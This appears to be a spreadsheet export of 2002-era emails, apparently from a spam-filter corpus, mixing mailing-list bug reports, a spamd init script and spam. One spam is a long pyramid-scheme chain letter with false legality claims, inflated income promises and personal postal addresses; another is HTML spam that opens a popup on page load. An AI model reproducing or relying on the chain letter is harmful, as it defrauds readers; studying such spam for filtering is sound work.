 With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these
 messages spit out from spamd:
 razor2 check skipped: No such file or directory Can't call method "log" on
 unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm
 line 211, &lt;STDIN&gt; line 75.
 Any ideas?  razor seems to run correctly over the command line.
 Thanks,
 -Dave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</si>
  <si>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Anolther sequence related traceback
</t>
  </si>
  <si>
    <t xml:space="preserve">Just got this ... I was just reading mail, but in a very dark
 room, where the keyboard is illuminated mostly by the light from
 the (laptop) screen.   I think I put my fingers on the wrong keys.
 (I mostly use the keyboard exclusively while running exmh).
 This is from today's cvs (the fixes for the problems I mentioned
 yesterday are included) - I eventually managed to contact the cvs
 server.
 expected integer but got ""
     while executing
 "incr m"
     (procedure "MhSeqExpand" line 12)
     invoked from within
 "MhSeqExpand $folder $msgids"
     (procedure "MhSeq" line 2)
     invoked from within
 "MhSeq $folder $seq $how $oldmsgids $msgids"
     (procedure "Mh_SequenceUpdate" line 54)
     invoked from within     
 "Mh_SequenceUpdate $folder replace $seq $msgids"
     (procedure "Seq_Set" line 4)
     invoked from within             
 "Seq_Set $folder cur $msgid"
     (procedure "Mh_SetCur" line 7)      
     invoked from within                     
 "Mh_SetCur $exmh(folder) $msgid"
     (procedure "MsgChange" line 5)              
     invoked from within                             
 "MsgChange - noshow"
     invoked from within                                 
 "time [list MsgChange $msgid $show"
     (procedure "Msg_Change" line 3)
     invoked from within                                     
 "Msg_Change $select(sel) noshow"
     (procedure "SelectTypein" line 14)                          
     invoked from within
 "SelectTypein .mid.right.top.msg -"
     (command bound to event)
 kre
 ps: I have the sequences window vertical instead of horizontal, and the
 "colours from the ftoc" stuff all deleted, and it is looking just about as
 good as the old unseen window used to look.   I still have some work to
 do to make it a little nicer (listboxes seem to have some strange habits)
 and then I need to make it all optional and parameterized, at the minute
 I'm just embedding stuff in the code, much quicker for prototyping.  Once
 its done, I'll send a patch for someone to look over.
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make thousands just sending emails.  It's easy.
</t>
  </si>
  <si>
    <t xml:space="preserve">From: whenopportunityknocksssss@yahoo.com
 To: &lt;Undisclosed Recipients&gt;					
 Subject: Earn money sending e-mails.  It's easy!
 	     NEW IMPROVED reports
 Dear Friend,
 You can earn a lot of money in the next 90 days sending e-mail.
 Seem impossible? Is there a catch?  NO, there is no catch; just
 send your e-mails and be on your way to financial freedom. 
 Basically, I send out as many of these e-mails as I can, then
 people send me cash in the mail for information that I just e-mail
 back to them. Everyday, I make a three minute drive to my P.O. Box
 knowing that there are at least a few hundred dollars waiting for
 me.  And the best part, IT IS COMPLETELY LEGAL.
 Just read the next few paragraphs and see what you think. If you
 like what you read, great! If you don't, read it again because you
 must have missed something.
 "AS SEEN ON NATIONAL TELEVISION" 
 "Making over a half million dollars every 6 months from your home
 for an investment of only $25 US dollars expense ONE TIME.  THANKS
 TO THE COMPUTER AGE AND THE INTERNET, BE A MILLIONAIRE LIKE OTHERS
 WITHIN A YEAR!!!  Before you say, "No Way!" read the following.
 This is the letter you've been reading about in the news lately.
 Due to the popularity of this letter on the Internet, a major
 nightly news program recently devoted an entire show to the
 investigation of the program described below to see if it really
 can make people money. 
 The show also investigated whether or not the program was legal.
 Their findings proved once and for all that there are absolutely
 no laws prohibiting the participation in this program. This has
 helped to show people that this is a simple, harmless, and fun way
 to make some extra money at home. And, besides even if you never
 got involved in the program, the reports themselves are well worth
 the money.  They can help you start and advertise ANY business on
 the internet.  That is, these reports stand alone and are
 beneficial to anyone wishing to do business on the internet.
 The results of this show have been truly remarkable. So many
 people are participating that those involved are doing much better
 than ever before. Since everyone makes more as more people try it
 out, its been very exciting to be a part of it lately. You will
 understand once you experience it. 
 "HERE IT IS BELOW" 
 *** Print This Now For Future Reference *** 
 The following income opportunity is one you may be interested in
 taking a look at. It can be started with VERY LITTLE investment
 ($25) and the income return is TREMENDOUS!!! 
 THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY. 
 It does not require you to come into contact with people, do any
 hard work, and best of all, you never have to leave your house
 except to get the mail. 
 Simply follow the instructions, and you really can make this
 happen. This e-mail order marketing program works every time if
 you put in the effort to make it work. E-mail is the sales tool of
 the future. Take advantage of this non-commercialized method of
 advertising NOW! 
 The longer you wait, the more savvy people will be taking your
 business using e-mail. Get what is rightfully yours. Program
 yourself for success and dare to think BIG. It sounds corny, but
 it's true. You'll never make it big if you don't have this belief
 system in place. 
 MULTI-LEVEL MARKETING (MLM) has finally gained respectability.  It
 is being taught in the Harvard Business School, and both Stanford
 Research and the Wall Street Journal have stated that between 50%
 and 65% of all goods and services will be sold through multi-level
 methods. 
 This is a Multi-Billion Dollar industry and of the 500,000
 millionaires in the U.S., 20% (100,000) made their fortune in the
 last several years in MLM. Moreover, statistics show 45people
 become millionaires everyday through Multi-Level Marketing. 
 You may have heard this story before, but Donald Trump made an
 appearance on the David Letterman show. Dave asked him what he
 would do if he lost everything and had to start over from scratch.
 Without hesitating Trump said he would find a good network
 marketing company and get to work. 
 The audience, started to hoot and boo him. He looked out at the
 audience and dead-panned his response. "That's why I'm sitting up
 here and you are all sitting out there!" 
 With network marketing you have two sources of income. Direct
 commissions from sales you make yourself and commissions from
 sales made by people you introduce to the business. 
 Residual income is the secret of the wealthy. It means investing
 time and money once, and getting paid again and again and again.
 In network marketing, it also means getting paid for the work of
 others. 
 The enclosed information is something I almost let slip through my
 fingers. Fortunately, sometime later I reread everything and gave
 some thought and study to it.
 My name is Jonathan Rourke. Two years ago, the corporation I
 worked at for the past twelve years down- sized and my position
 was eliminated. After unproductive job interviews, I decided to
 open my own business. Over the past year, I incurred many
 unforeseen financial problems. I owed my family, friends and
 creditors over $35,000. The economy was taking a toll on my
 business and I just couldn't seem to make ends meet. I had to
 refinance and borrow against my home to support my family and
 struggling business. AT THAT MOMENT something significant happened
 in my life and I am writing to share that experience in hopes that
 this will change your life FOREVER FINANCIALLY!!! 
 In mid December, I received this program via e-mail. Six month's
 prior to receiving this program, I had been sending away for
 information on various business opportunities. All of the programs
 I received, in my opinion were not cost effective. They were
 either too difficult for me to comprehend or the initial
 investment was too much for me to risk to see if they would work
 or not. One claimed that I would make a million dollars in one
 year. It didn't tell me I'd have to write a book to make it! 
 But like I was saying, in December I received this program. I
 didn't send for it, or ask for it; they just got my name off a
 mailing list. THANK GOODNESS FOR THAT!!! 
 After reading it several times, to make sure I was reading it
 correctly, I couldn't believe my eyes. 
 Here was a MONEY MAKING PHENOMENON. 
 I could invest as much as I wanted to start without putting me
 further into debt. After I got a pencil and paper and figured it
 out, I would at least get my money back. But like most of you I
 was still a little skeptical and a little worried about the legal
 aspects of it all. So I checked it out with the U.S. Post Office
 (1-800-725-2161 24 hrs) and they confirmed that it is indeed
 legal! After determining the program was LEGAL and NOT A CHAIN
 LETTER, I decided "WHY NOT." 
 Initially I sent out 10,000 e-mails. It cost me about $15 for my
 time on-line. The great thing about e-mail is that I don't need
 any money for printing to send out the program, and because all of
 my orders are filled via e-mail, the only expense is my time. I am
 telling you like it is. I hope it doesn't turn you off, but I
 promised myself that I would not 'rip-off" anyone, no matter how
 much money it cost me. 
 Here is the basic version of what you need to do: 
 Your first goal is to receive at least 20 orders for Report #1
 within 2 weeks of your first program going out. IF YOU DON'T, SEND
 OUT MORE PROGRAMS UNTIL YOU DO. 
 Your second goal is to receive at least 150+ orders for Report #2
 within 4 weeks. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO. 
 Once you have your 150 orders, relax, you've met your goal. You
 will make $50,000+ but keep at it! If you don't get 150 right off,
 keep at it! It may take some time for your down line to build.
 Keep at it, stay focused, and do not let yourself get distracted. 
 In less than one week, I was starting to receive orders for REPORT
 #1. I kept at it - kept mailing out the program and by January 13,
 1 had received 26 orders for REPORT #1. My first step in making
 $50,000 in 90 days was done. 
 By January 30, 1 had received 196 orders for REPORT #2; 46 more
 than I needed. So I sat back and relaxed. By March 1, of my
 e-mailing of 10,000, I received $58,000 with more coming in every
 day. I paid off ALL my debts and bought a much needed new car.
 Please take time to read the attached program, IT WILL CHANGE YOUR
 LIFE FOREVER!!  Remember, it won't work if you don't try it. This
 program does work, but you must follow it EXACTLY! Especially the
 rules of not trying to place your name in a different place. It
 won't work, you'll lose out on a lot of money! 
 In order for this program to work very fast, try to meet your goal
 of 20+ orders for Report #1, and 150+ orders for Report #2 and you
 will make $50,000 or more in 90 days. If you don't reach the first
 two goals with in four weeks, relax, you will still make a ton of
 money, it may take a few months or so longer. But keep mailing out
 the programs and stay focused! That's the key.  I AM LIVING PROOF
 THAT IT WORKS!!! If you choose not to participate in this program,
 I am sorry. It really is a great opportunity with little cost or
 risk to you. If you choose to participate, follow the program and
 you will be on your way to financial security. 
 If you are a fellow business owner and are in financial trouble
 like I was, or you want to start your own business, consider this
 a sign. I DID!  -Sincerely,  Jonathan Rourke 
 P.S.  Do you have any idea what 11,700 $5 bills ($58,000) look
 like piled up on a kitchen table? IT'S AWESOME!
 A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM: 
 By the time you have read the enclosed program and reports, you
 should have concluded that such a program, and one that is legal,
 could not have been created by an amateur. 
 Let me tell you a little about myself. I had a profitable business
 for 10 years. Then in 1979 my business began falling off. I was
 doing the same things that were previously successful for me, but
 it wasn't working. 
 Finally, I figured it out. It wasn't me; it was the economy.
 Inflation and recession had replaced the stable economy that had
 been with us since 1945. 
 I don't have to tell you what happened to the unemployment
 rate...because many of you know from first hand experience. There
 were more failures and bankruptcies than ever before. 
 The middle class was vanishing. Those who knew what they were
 doing invested wisely and moved up. Those who did not including
 those who never had anything to save or invest were moving down
 into the ranks of the poor. 
 As the saying goes, 'THE RICH GET RICHER AND THE POOR GET POORER."
 The traditional Methods of making money will never allow you to
 "move up" or "get rich". Inflation will see to that. 
 You have just received information that can give you financial
 freedom for the rest of your life, with "NO RISK"and "JUST A
 LITTLE BIT OF EFFORT." You can make more money in the next few
 months than you have ever imagined. 
 Follow the program EXACTLY AS INSTRUCTED. Do not change it in any
 way. It works exceedingly well as it is now. Remember to e-mail a
 copy of this exciting report to everyone you can think of. One of
 the people you send this to may send out 50,000 ... and your name
 will be on everyone of them! 
 Remember though, the more you send out the more potential
 customers you will reach. 
 So my friend, I have given you the ideas, information, materials
 and opportunity to become financially independent.  IT IS UP TO
 YOU NOW! 
 "THINK ABOUT IT." Before you delete this program from your
 mailbox, as I almost did, take a little time to read it and REALLY
 THINK ABOUT IT. Get a pencil and figure out what could happen when
 YOU participate. Figure out the worst possible response and no
 matter how you calculate it, you will still make a lot of money!
 You will definitely get back what you invested. Any doubts you
 have will vanish when your first orders come in. IT WORKS! -Jody
 Jacobs, Richmond, VA 
 HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU THOUSANDS OF DOLLAR$ 
 This method of raising capital REALLY WORKS 100% EVERY TIME. I am
 sure that you could use up to $50,000 or more in the next 90 days. 
 Before you say "No Way!" please read this program carefully. This
 is not a chain letter, but a perfectly legal money making
 opportunity. Basically, this is what you do:  As with all
 multilevel businesses, we- build our business by recruiting new
 partners and selling our products. Every state in the USA allows
 you to recruit new multilevel business partners, and we offer a
 product for EVERY dollar sent. YOUR ORDERS COME BY MAIL AND ARE
 FILLED BY E-MAIL, so you are not involved in personal selling. You
 do it privately in your own home, store, or office. 
 This is the GREATEST Multi-Level Mail Order Marketing anywhere:
 This is what you MUST do. 
 1. Order all 5 reports shown on the list below (You can't sell
 them if you don't have them). 
 * For each report, send $5.00 CASH, the NAME &amp; NUMBER OF THE
 REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR NAME &amp;
 RETURN ADDRESS (in case of a problem). 
 *MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE - IN CASE OF
 ANY MAIL PROBLEMS! 
 * When you place your order, make sure you order each of the five
 reports. You need all five reports so that you can save them on
 your computer and resell them. 
 * Within a few days you will receive, via e-mail, each of the five
 reports. Save them on your computer so they will be accessible for
 you to send to the 1,000's of people who will order them from you. 
 2. IMPORTANT- DO NOT alter the names of the people who are listed
 next to each report, or their order
 on the list in any way other than as instructed below in steps "a"
 through 'g" or you will lose out on the majority of your profits.
 Once you understand the way this works you'll also see how it
 doesn't work if you change it. Remember, this method has been
 tested, and if you alter it, it will not work. 
 a. Look below for the listing of available reports. 
 b. After you've ordered the. five reports, take this Advertisement
 and remove the name and address under REPORT #5. This person has
 made it through the cycle and is no doubt counting their $50,000! 
 c. Move the name and address under REPORT #4 down to REPORT #5. 
 d. Move the name and address under REPORT #3 down to REPORT #4. 
 e. Move the name and address under REPORT #2 down to REPORT #3 
 f. Move the name and address under REPORT #1 down to REPORT #2. 
 g. Insert your name and address in the REPORT #1 position. 
 Please make sure you copy every name and address ACCURATELY! Copy
 and paste method works well,.
 3. Take this entire letter, including the modified list of names,
 and save it to your computer. Make NO changes to the Instruction
 portion of this letter. 
 Your cost to participate in this is practically nothing (surely
 you can afford $25). You obviously already have an Internet
 Connection and e-mail is FREE! 
 To assist you with marketing your business on the internet, the 5
 reports you purchase will provide you with invaluable marketing
 information which includes how to send bulk e-mails, where to find
 thousands of free classified ads and much, much more. 
 Here are two primary methods of building your downline: 
 METHOD #1: SENDING BULK E-MAIL 
 Let's say that you decide to start small, just to see how it goes,
 and we'll assume you and all those involved send out only 2,000
 programs each. Let's also assume that the mailing receives a 0.5%
 response. Using a good list, the response could be much better.
 Also, many people will send out hundreds of thousands of programs
 instead of 2,000. But continuing with this example, you send out
 only 2,000 programs. With a 0.5% response, that is only 10 orders
 for REPORT #1. Those 10 people respond by sending out 2,000
 programs each for a total of 20,000. Out of those 0.5%, 100 people
 respond and order REPORT #2. 
 Those 100 mail out 2,000 programs each for a total of 200,000. The
 0.5% response to that is 1,000 orders for REPORT #3. Those 1,000
 send out 2,000 programs each for a 2,000,000 total. The 0.5%
 response to that is I 0,000 orders for REPORT #4. That amounts to
 10,000 each of $5 bills for you in CASH MONEY! Then think about
 level five!  That's $500,000 alone!
 Your total income in this example is $50 + $500 + $5,000+ $50,000
 + $500,000 for a total of $555,550!!! 
 REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF THE 2,000 PEOPLE
 YOU MAIL TO WILL DO ABSOLUTELY NOTHING AND TRASH THIS PROGRAM!
 DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE, OR HALF
 SENT OUT 100,000 PROGRAMS INSTEAD OF 2,000. Believe me, many
 people will do just that and more! 
 REPORT #2 will show you the best methods for bulk e-mailing, and
 e-mail software. 
 METHOD #2 - PLACING FREE ADS ON THE INTERNET 
 1. Advertising on the Net is very, very inexpensive, and there are
 HUNDREDS of FREE places to advertise. Let's say you decide to
 start small just to see how well it works. Assume your goal is to
 get ONLY 10 people to participate on your first level. Placing a
 lot of FREE ads on the internet will EASILY get a larger response.
 Also assume that everyone else in YOUR ORGANIZATION gets ONLY 10
 downline members. Follow this example to achieve the STAGGERING
 results below: 
 1st level-your 10 members with $5 ....... $50 
 2nd level-10 members from those 10 ($5 x 100) ....... $500 
 3rd level-10 members from those 100 ($5 x 1,000).......  $5,000 
 4th level-10 members from those 1,000 ($5 x 10k) .......  $50,000 
 5th level-10 members from those 10,000 ($5 x 100k) .......  $500,000
 THIS TOTALS     -      $555,550 
 Remember friends, this assumes that the people who participate
 only recruit 10 people each. Think for a moment what would happen
 if they got 20 people to participate! Most people get 100's of
 participants. 
 THINK ABOUT IT! For every $5.00 you receive, all you must do is
 e-mail them the report they ordered. THAT'S IT! ALWAYS PROVIDE
 SAME-DAY SERVICE ON ALL ORDERS! This will guarantee that the
 e-mail THEY send out with YOUR name and address on it will be
 prompt because they can't advertise until they receive the report! 
 AVAILABLE REPORTS         *** Order Each REPORT by NUMBER, AND
 NAME *** 
 * ALWAYS SEND $5 CASH (U.S. CURRENCY) FOR EACH REPORT. CHECKS NOT
 ACCEPTED * - ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL - Make
 sure the cash is concealed by wrapping it in at least two sheets
 of paper (SO THAT THE BILL CAN'T BE SEEN AGAINST LIGHT)  On one of
 those sheets of paper include: 
 (a) the number &amp; name of the report you are ordering,
 (b) your e-mail address, and 
 (c) your name &amp; postal address (in case your e-mail provider
 encounters problems). 
 PLACE YOUR ORDER FOR THESE REPORTS NOW: 
 REPORT #1 "The Insiders Guide to Advertizing for Free on the
 Internet" 
 ORDER REPORT #1 FROM: 
 Randy Dillard
 P.O. Box 8 
 Osprey, FL 34229 
 USA 
 REPORT #2 "The Insiders Guide to Sending Bulk Email on the
 Internet" 
 ORDER REPORT #2 FROM:  
 Carla Brown
 P.O. Box 39093
 Sarasota, FL 34238
 USA
 REPORT #3 "The Secrets to Multilevel Marketing on the Internet" 
 ORDER REPORT #3 FROM: 
 Glynn Schmidt 
 P.O. Box 19424
 Sarasota, FL  34276
 USA
 REPORT #4 'How to become a Millionaire utilizing the Power of
 Multilevel Marketing and the Internet" 
 ORDER REPORT #4 FROM: 
 Christin Joy
 CPO 2398
 501 E. College Avenue
 Wheaton, IL 60187
 USA
 REPORT #5 "How to Send One Million E-Mails for Free."
 ORDER REPORT #5 FROM: 
 Cheri Gerhart
 81719 Lido Avenue
 Indio, CA 92201
 USA
 About 50,000 new people get online every month! 
 ******* TIPS FOR SUCCESS ******* 
 * TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and follow
 the directions accurately. 
 * Send for the five reports IMMEDIATELY so you will have them when
 the orders start coming in. When you receive a $5 order, you MUST
 send out the requested product/report. 
 * ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE. 
 * Be patient and persistent with this program. If you follow the
 instructions exactly, your results WILL BE SUCCESSFUL! 
 * ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED! 
 ******* YOUR SUCCESS GUIDELINES ******* 
 Follow these guidelines to guarantee your success: 
 Start posting ads as soon as you mail off for the reports! By the
 time you start receiving orders, your reports will be in your
 mailbox! For now, something simple, such as posting on message
 boards something to the effect of "Would you like to know how to
 earn $50,000 working out of your house with NO initial investment?
 Email me with the keywords "more info" to find out how. And, when
 they email you, send them this report in response! 
 If you don't receive 20 orders for REPORT #1 within two weeks,
 continue advertising or sending e-mails until you do. 
 Then, a couple of weeks later you should receive at least 100
 orders for REPORT#2. If you don't, continue advertising or sending
 e-mails until you do. Once you have received 100 or more orders
 for REPORT #2, YOU CAN RELAX, because the system is already
 working for you, and the cash will continue to roll in! 
 THIS IS IMPORTANT TO REMEMBER: Every time your name is moved down
 on the list you are placed in front of a DIFFERENT report. You can
 KEEP TRACK of your PROGRESS by watching which report people are
 ordering from you. If you want to generate more income, send
 another batch of e-mails or continue placing ads and start the
 whole process again! There is no limit to the income you will
 generate from this business! 
 Before you make your decision as to whether or not you participate
 in this program, answer one question ...
 DO YOU WANT TO CHANGE YOUR LIFE? If the answer is yes, please look
 at the following facts about this program: 
 1. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO
 PRODUCE! 
 2. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO SHIP! 
 3. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST YOU ANYTHING TO
 ADVERTISE! 
 4. YOU ARE UTILIZING THE POWER OF THE INTERNET AND THE POWER OF
 MULTI-LEVEL MARKETING TO DISTRIBUTE YOUR PRODUCT ALL OVER THE
 WORLD! 
 5. YOUR ONLY EXPENSES OTHER THAN YOUR INITIAL $25 INVESTMENT IS
 YOUR TIME! 
 6. VIRTUALLY ALL OF THE INCOME YOU GENERATE FROM THIS PROGRAM IS
 PURE PROFIT! 
 7. THIS PROGRAM WILL CHANGE YOUR LIFE FOREVER. 
 ******* TESTIMONIALS******* 
 This program does work, but you must follow it EXACTLY! Especially
 the rule of not trying to place your name in a different position,
 it won't work and you'll lose a lot of potential income. I'm
 living proof that it works. It really is a great opportunity to
 make relatively easy money, with little cost to you. If you do
 choose to participate, follow the program exactly, and you'll be
 on your way to financial security. -Steven Bardfield, Portland, OR 
 My name is Mitchell.  My wife, Jody, and I live in Chicago, IL. I
 am a cost accountant with a major U.S. Corporation and I make
 pretty good money. When I received the program I grumbled to Jody
 about receiving "junk mail." I made fun of the whole thing,
 spouting my knowledge of the population and percentages involved.
 I 'knew' it wouldn't work. Jody totally ignored my supposed
 intelligence and jumped in with both feet. I made merciless fun of
 her, and was ready to lay the old 'I told you so' on her when the
 thing didn't work... well, the laugh was on me! Within two weeks
 she had received over 50 responses. Within 45 days she had
 received over $147,200 in $5 bills! I was shocked! I was sure that
 I had it all figured and that it wouldn't work. I AM a believer
 now. I have joined Jody in her "hobby. " I did have seven more
 years until retirement, but I think of the 'rat race,' and it's
 not for me. We owe it all to MLM. -Mitchell Wolf MD., Chicago, IL. 
 The. main reason for this letter is to convince you that this
 system is honest, lawful, extremely profitable, and is a way to
 get a large amount of money in a short time. I was approached
 several times before 1 checked this out. I joined just to see what
 one could expect in return for the minimal effort and money
 required. To my astonishment I received $36,470.00 in the first 14
 weeks, with money still coming in. 
 -Charles Morris, Esq. 
 Not being the gambling type, it took me several weeks to make up
 my mind to participate in this plan. But conservative that I am, I
 decided that the initial investment was so little that there was
 just no way that I wouldn't get enough orders to at least get my
 money back. Boy, was I surprised when I found my medium- size post
 office box crammed with orders! For awhile, it got so overloaded
 that I had to start picking up my mail at the window. I'll make
 more money this year than any 10 years of my life before. The nice
 thing about this deal is that it doesn't matter where people live.
 There simply isn't a better investment with a faster return. 
 -Paige Willis, Des Moines, IA 
 I had received this program before. I deleted it, but later I
 wondered if I shouldn't have given it a try. Of course, I had no
 idea who to contact to get another copy, so I had to wait until I
 was e-mailed another program ... 11 months passed then it came ...
 I didn't delete this one! ... I made. more than $41,000 on the
 first try!!  -Violet Wilson, Johnstown, PA 
 This is my third time to participate in this plan. We have quit
 our jobs, and will soon buy a home on the beach and live off the
 interest on our money. The only way on earth that this plan will
 work for you is if you do it. For your sake, and for your family's
 sake don't pass up this golden opportunity. Good luck and happy
 spending!  -Kerry Ford, Centerport, NY 
 IT IS UP TO YOU NOW!  Take 5 minutes to Change Your Future!
 ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO FINANCIAL
 FREEDOM! 
 FOR YOUR INFORMATION: If you need help with starting a business,
 registering a business name, learning how income tax is handled,
 etc., contact your local office of the Small Business
 Administration (a Federal agency) 1(800) 827-5722 for free help
 and answers to questions. Also, the Internal Revenue Service
 offers free help via telephone and free seminars about business
 tax requirements. 
 Under Bill S1618 Title HI passed by the 105th US Congress this
 letter cannot be considered spam as long as the sender includes
 contact information and a method of removal. This is a one time
 e-mail transmission. No request for removal is necessary  To
 remove (even though this is not necessary) press
 whenopportunityknocksssss@yahoo.com
 STOP! If you never read another e-mail PLEASE take a moment to
 read this one.  This really is worth your valuable time.  Even if
 you never got involved in the program, the reports themselves are
 well worth the money.  They can help you start and advertise ANY
 business on the internet.  That is, these reports stand alone and
 are beneficial to anyone wishing to do business on the internet.
 At the very least PRINT THIS OUT NOW to read later if you are
 pressed for time.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</si>
  <si>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Some Quickies.  Lots of 'em.  Something for everyone.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000184.html
 Date: 2002-09-19T21:59:17-08:00
 It appears that hfb has an evil toilet. It's a good thing that Josh never met 
 it. She also found some amusing lines to use at work. I could use a few of 
 those myself. It's not like we didn't...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/spamd pld-rc-script.sh,NONE,1.1
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/spamd
 In directory usw-pr-cvs1:/tmp/cvs-serv21113/spamd
 Added Files:
 	pld-rc-script.sh 
 Log Message:
 patch from Radoslaw Zielinski &lt;radek@karnet.pl&gt;: rpm support for PLD Linux Distribution.  Makefile.PL created Makefile, which caused problems with DESTDIR; fixed. also rc-script for PLD
 --- NEW FILE: pld-rc-script.sh ---
 #!/bin/sh
 #
 # spamassassin This script starts and stops the spamd daemon
 #
 # chkconfig: 2345 80 30
 #
 # description: spamd is a daemon process which uses SpamAssassin to check
 #              email messages for SPAM.  It is normally called by spamc
 #	           from a MDA.
 # processname:	spamassassin
 # pidfile:	/var/run/spamassassin.pid
 # Source function library.
 . /etc/rc.d/init.d/functions
 # Source networking configuration.
 . /etc/sysconfig/network
 # Source configureation.
 if [ -f /etc/sysconfig/spamassassin ] ; then
 	. /etc/sysconfig/spamassassin
 fi
 # Check that networking is up.
 if is_no "${NETWORKING}"; then
 	msg_Network_Down SpamAssassin
 	exit 1
 fi
 # See how we were called.
 case "$1" in
   start)
 	# Start daemon.
 	if [ ! -f /var/lock/subsys/spamd ]; then
 		msg_starting SpamAssassin
 		daemon spamd -d -c -a
 		RETVAL=$?
 		[ $RETVAL -eq 0 ] &amp;&amp; touch /var/lock/subsys/spamd
 	else
 		msg_Not_Running SpamAssassin
 	fi
 	;;
   stop)
 	# Stop daemons.
 	if [ -f /var/lock/subsys/spamd ]; then
 		echo -n "Shutting down spamd: "
 		killproc spamd
 		RETVAL=$?
 		rm -f /var/lock/subsys/spamd
 	else
 		msg_Already_Running SpamAssassin
 	fi
 	;;
   restart)
 	$0 stop
 	$0 start
 	;;
   status)
 	status spamd
 	;;
   *)
 	msg_Usage "$0 {start|stop|restart|status}"
 	exit 1
 esac
 exit $RETVAL
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; You're probably running exmh on a local machine.  I'm running it on a
 &gt; &gt; very remote machine.  In this scenario, the mime handling is weak.
 &gt; 
 &gt; Nope.  I run exmh on my desktops at home and at work with the resulting
 &gt; exmh windows being displayed on both my work and home desktops (gratis
 &gt; SSH X11 forwarding).
 I run exmh routinely from home (broadband) using an XWindows Client tunneled through ssh under &lt;ahem&gt; WinXP.  It works very well in this fashion.
 FWIW, I use Eudora under Winder$ because it's less of a virus magnet.  :)
 There's more to the story why I run Winder$, but that's really off-topic and I'm already guilty!
 -=d
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] Maybe change X-Spam-Disposition to something else...
</t>
  </si>
  <si>
    <t xml:space="preserve">
     &gt;&gt; Accordingly, I wrote unheader.py, which is mostly a ripoff of
     &gt;&gt; something someone else posted to python-dev or c.l.py within the last
     &gt;&gt; week or so to strip out SA-generated headers.
     Tim&gt; Unless I've grown senile tonight, you got it from Anthony to begin
     Tim&gt; with.  Please check it in to project, and add a short blurb to
     Tim&gt; README.txt!
 Raring to go, once I can write to CVS...
 S
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Best product for 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 	&lt;META NAME=3D"GENERATOR" Content=3D"Visual Page 1.0 for Windows"&gt;
 	&lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;CHARSET=3Diso-8859=
 -1"&gt;
 	&lt;TITLE&gt;untitled&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY onLoad=3D"(window.open('http://dvd.specialdiscounts4u.com/'))"&gt;
 &lt;P ALIGN=3D"CENTER"&gt;&lt;FONT COLOR=3D"#0000FF" face=3D"Arial"&gt;&lt;B&gt;Copy DVD Mov=
 ies?&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;FONT COLOR=3D"#000000" face=3D"Arial"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT face=3D"Arial"&gt;&lt;B&gt;Yes!  Copy and burn your own DVD
 movies and video with a CD-R Drive.&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;FONT COLOR=3D"#000000" face=3D"Arial"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT COLOR=3D"#FF0000" face=3D"Arial"&gt;&lt;B&gt;* Order by September 21, =
 2002, and receive the following Free Gifts!
 1. "Free DVD Movie of your choice ($20.00 Value)
 2. Cell Phone Battery Booster ($19.95 Value)
 Own all the DVD's you've always wanted
 and start burning today!
 .&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P ALIGN=3D"CENTER"&gt;&lt;FONT COLOR=3D"#FF0000" face=3D"Arial"&gt;&lt;B&gt;&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;A HREF=3D"http://dvd.specialdiscounts4u.com/ "&gt;&lt;FONT face=3D"A=
 rial"&gt;&lt;B&gt;Click Here Now!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Don't Be a Victim protect your Laptop
</t>
  </si>
  <si>
    <t xml:space="preserve">
